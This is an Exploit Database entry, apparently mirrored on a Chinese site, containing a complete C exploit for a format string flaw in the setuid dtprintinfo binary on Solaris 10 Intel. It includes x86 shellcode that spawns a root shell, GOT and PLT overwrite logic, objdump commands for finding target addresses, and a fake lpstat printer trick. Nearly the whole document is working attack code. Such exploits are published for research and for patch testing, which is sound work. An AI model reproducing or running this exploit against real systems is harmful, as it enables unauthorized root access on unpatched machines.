Solaris 10 (Intel) – ‘dtprintinfo’ Local Privilege Escalation (3)

• Exploit Database
• 10 阅读

• 作者： Marco Ivaldi
  日期： 2021-02-02
• 类别：

  • local
  平台：

  • solaris
• 来源：https://www.exploit-db.com/exploits/49515/

• # Exploit Title: Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation (3)
  # Date: 2021-02-01
  # Exploit Author: Marco Ivaldi
  # Vendor Homepage: https://www.oracle.com/solaris/solaris10/
  # Version: Solaris 10
  # Tested on: Solaris 10 1/13 Intel
  
  /*
   * raptor_dtprintcheckdir_intel2.c - Solaris/Intel FMT LPE
   * Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
   *
   * "I'm gonna have to go into hardcore hacking mode!" -- Hackerman
   * https://youtu.be/KEkrWRHCDQU
   *
   * Same code snippet, different vulnerability. 20 years later, format string
   * bugs are not extinct after all! The vulnerable function looks like this:
   *
   * void __0FJcheck_dirPcTBPPP6QStatusLineStructPii(...)
   * {
   * ...
   * 	char local_724 [300];
   * ...
   * 	else {
   * 		__format = getenv("REQ_DIR");
   * 		sprintf(local_724,__format,param_2); // [1]
   * 	}
   * ...
   * 	local_c = strlen(local_724); // [2]
   * 	sprintf(local_5f8,"/var/spool/lp/tmp/%s/",param_2); // [3]
   * ...
   * }
   *
   * The plan (inspired by an old technique devised by gera) is to exploit the 
   * sprintf at [1], where we control the format string, to replace the strlen 
   * at [2] with a strdup and the sprintf at [3] with a call to the shellcode
   * dynamically allocated in the heap by strdup and pointed to by the local_c 
   * variable at [2]. In practice, to pull this off the structure of the evil 
   * environment variable REQ_DIR must be:
   * [sc] [pad] [.got/strlen] [.got/sprintf] [stackpop] [W .plt/strdup] [W call *-0x8(%ebp)]
   *
   * To collect the needed addresses for your system, use:
   * $ objdump -R /usr/dt/bin/dtprintinfo | grep strlen # .got
   * 080994cc R_386_JUMP_SLOT strlen
   * $ objdump -R /usr/dt/bin/dtprintinfo | grep sprintf # .got
   * 080994e4 R_386_JUMP_SLOT sprintf
   * $ objdump -x /usr/dt/bin/dtprintinfo | grep strdup # .plt
   * 0805df20 F *UND*00000000 strdup
   * $ objdump -d /usr/dt/bin/dtprintinfo | grep call | grep ebp | grep -- -0x8 # .text
   * 08067f52: ff 55 f8call *-0x8(%ebp)
   *
   * This bug was likely fixed during the general cleanup of CDE code done by
   * Oracle in response to my recently reported vulnerabilities. However, I can't
   * confirm this because I have no access to their patches:/
   *
   * See also:
   * raptor_dtprintcheckdir_intel.c (vulnerability found by Marti Guasch Jimenez)
   * raptor_dtprintcheckdir_sparc.c (just a proof of concept)
   * raptor_dtprintcheckdir_sparc2.c (the real deal)
   *
   * Usage:
   * $ gcc raptor_dtprintcheckdir_intel2.c -o raptor_dtprintcheckdir_intel2 -Wall
   * [on your xserver: disable the access control]
   * $ ./raptor_dtprintcheckdir_intel2 192.168.1.1:0
   * [on your xserver: double click on the fake "fnord" printer]
   * [...]
   * # id
   * uid=0(root) gid=1(other)
   * #
   *
   * Tested on:
   * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
   * [previous Solaris versions are also likely vulnerable]
   */
  
  #include <stdio.h>
  #include <stdlib.h>
  #include <strings.h>
  #include <unistd.h>
  #include <sys/stat.h>
  #include <sys/systeminfo.h>
  
  #define INFO1	"raptor_dtprintcheckdir_intel2.c - Solaris/Intel FMT LPE"
  #define INFO2	"Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
  
  #define	VULN		"/usr/dt/bin/dtprintinfo"	// vulnerable program
  #define	BUFSIZE		300				// size of evil env var
  #define	STACKPOPSEQ	"%.8x"				// stackpop sequence
  #define	STACKPOPS	14				// number of stackpops
  
  /* replace with valid addresses for your system */
  #define STRLEN		0x080994cc			// .got strlen address
  #define	SPRINTF		0x080994e4			// .got sprintf address
  #define STRDUP		0x0805df20			// .plt strdup address
  #define	RET		0x08067f52			// call *-0x8(%ebp) address
  
  /* split an address in 4 bytes */
  #define SPLITB(b1, b2, b3, b4, addr) {	\
  	b1 = (addr & 0x000000ff);	\
  	b2 = (addr & 0x0000ff00) >> 8;	\
  	b3 = (addr & 0x00ff0000) >> 16;	\
  	b4 = (addr & 0xff000000) >> 24;	\
  }
  
  char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
  /* double setuid() */
  "\x31\xc0\x50\x50\xb0\x17\xcd\x91"
  "\x31\xc0\x50\x50\xb0\x17\xcd\x91"
  /* execve() */
  "\x31\xc0\x50\x68/ksh\x68/bin"
  "\x89\xe3\x50\x53\x89\xe2\x50"
  "\x52\x53\xb0\x3b\x50\xcd\x91";
  
  /* globals */
  char	*arg[2] = {"foo", NULL};
  char	*env[256];
  int	env_pos = 0, env_len = 0;
  
  /* prototypes */
  int	add_env(char *string);
  
  /*
   * main()
   */
  int main(int argc, char **argv)
  {
  	char		buf[BUFSIZE], *p = buf;
  	char		platform[256], release[256], display[256];
  
  	int		i, stackpops = STACKPOPS;
  	unsigned	base, n1, n2, n3, n4, n5, n6, n7, n8;
  	unsigned char	strdup1, strdup2, strdup3, strdup4;
  	unsigned char	ret1, ret2, ret3, ret4;
  
  	int		strlen_got = STRLEN;
  	int		sprintf_got = SPRINTF;
  	int		strdup_plt = STRDUP;
  	int		ret = RET;
  
  	/* lpstat code to add a fake printer */
  	if (!strcmp(argv[0], "lpstat")) {
  
  		/* check command line */
  		if (argc != 2)
  			exit(1);
  
  		/* print the expected output and exit */
  		if(!strcmp(argv[1], "-v")) {
  			fprintf(stderr, "lpstat called with -v\n");
  			printf("device for fnord: /dev/null\n");
  		} else {
  			fprintf(stderr, "lpstat called with -d\n");
  			printf("system default destination: fnord\n");
  		}
  		exit(0);
  	}
  
  	/* print exploit information */
  	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
  
  	/* process command line */
  	if (argc != 2) {
  		fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
  		exit(1);
  	}
  	sprintf(display, "DISPLAY=%s", argv[1]);
  
  	/* evil env var: name + shellcode + padding */
  	bzero(buf, BUFSIZE);
  	sprintf(buf, "REQ_DIR=%s#", sc);
  	p += strlen(buf);
  
  	/* format string: .got strlen address */
  	*((void **)p) = (void *)(strlen_got); p += 4;
  	memset(p, 'A', 4); p += 4; /* dummy */
  	*((void **)p) = (void *)(strlen_got + 1); p += 4;
  	memset(p, 'A', 4); p += 4; /* dummy */
  	*((void **)p) = (void *)(strlen_got + 2); p += 4;
  	memset(p, 'A', 4); p += 4; /* dummy */
  	*((void **)p) = (void *)(strlen_got + 3); p += 4;
  	memset(p, 'A', 4); p += 4; /* dummy */
  
  	/* format string: .got sprintf address */
  	*((void **)p) = (void *)(sprintf_got); p += 4;
  	memset(p, 'A', 4); p += 4; /* dummy */
  	*((void **)p) = (void *)(sprintf_got + 1); p += 4;
  	memset(p, 'A', 4); p += 4; /* dummy */
  	*((void **)p) = (void *)(sprintf_got + 2); p += 4;
  	memset(p, 'A', 4); p += 4; /* dummy */
  	*((void **)p) = (void *)(sprintf_got + 3); p += 4;
  
  	/* format string: stackpop sequence */
  	base = strlen(buf) - strlen("REQ_DIR=");
  	for (i = 0; i < stackpops; i++, p += strlen(STACKPOPSEQ), base += 8)
  		strcat(p, STACKPOPSEQ);
  
  	/* calculate numeric arguments for .plt strdup address */
  	SPLITB(strdup1, strdup2, strdup3, strdup4, strdup_plt);
  	n1 = (strdup1 - base)					% 0x100;
  	n2 = (strdup2 - base - n1)				% 0x100;
  	n3 = (strdup3 - base - n1 - n2)				% 0x100;
  	n4 = (strdup4 - base - n1 - n2 - n3)			% 0x100;
  
  	/* calculate numeric arguments for call *-0x8(%ebp) address */
  	SPLITB(ret1, ret2, ret3, ret4, ret);
  	n5 = (ret1 - base - n1 - n2 - n3 - n4)			% 0x100;
  	n6 = (ret2 - base - n1 - n2 - n3 - n4 - n5)		% 0x100;
  	n7 = (ret3 - base - n1 - n2 - n3 - n4 - n5 - n6)	% 0x100;
  	n8 = (ret4 - base - n1 - n2 - n3 - n4 - n5 - n6 - n7)	% 0x100;
  
  	/* check for potentially dangerous numeric arguments below 10 */
  	n1 += (n1 < 10) ? (0x100) : (0);
  	n2 += (n2 < 10) ? (0x100) : (0);
  	n3 += (n3 < 10) ? (0x100) : (0);
  	n4 += (n4 < 10) ? (0x100) : (0);
  	n5 += (n5 < 10) ? (0x100) : (0);
  	n6 += (n6 < 10) ? (0x100) : (0);
  	n7 += (n7 < 10) ? (0x100) : (0);
  	n8 += (n8 < 10) ? (0x100) : (0);
  
  	/* format string: write string */
  	sprintf(p, "%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n", n1, n2, n3, n4, n5, n6, n7, n8);
  
  	/* fill the envp, keeping padding */
  	add_env(buf);
  	add_env(display);
  	add_env("TMP_DIR=/tmp");
  	add_env("PATH=.:/usr/bin");
  	add_env("HOME=/tmp");
  	add_env(NULL);
  
  	/* we need at least one directory inside TMP_DIR to trigger the bug */
  	mkdir("/tmp/one_dir", S_IRWXU | S_IRWXG | S_IRWXO);
  
  	/* create a symlink for the fake lpstat */
  	unlink("lpstat");
  	symlink(argv[0], "lpstat");
  
  	/* print some output */
  	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
  	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
  	fprintf(stderr, "Using SI_PLATFORM\t\t: %s (%s)\n", platform, release);
  	fprintf(stderr, "Using strlen address in .got\t: 0x%p\n", (void *)strlen_got);
  	fprintf(stderr, "Using sprintf address in .got\t: 0x%p\n", (void *)sprintf_got);
  	fprintf(stderr, "Using strdup address in .plt\t: 0x%p\n", (void *)strdup_plt);
  	fprintf(stderr, "Using call *-0x8(%%ebp) address\t: 0x%p\n\n", (void *)ret);
  
  	/* run the vulnerable program */
  	execve(VULN, arg, env);
  	perror("execve");
  	exit(1);
  }
  
  /*
   * add_env(): add a variable to envp and pad if needed
   */
  int add_env(char *string)
  {
  	int	i;
  
  	/* null termination */
  	if (!string) {
  		env[env_pos] = NULL;
  		return env_len;
  	}
  
  	/* add the variable to envp */
  	env[env_pos] = string;
  	env_len += strlen(string) + 1;
  	env_pos++;
  
  	/* pad the envp using zeroes */
  	if ((strlen(string) + 1) % 4)
  		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
  			env[env_pos] = string + strlen(string);
  			env_len++;
  		}
  
  	return env_len;
  }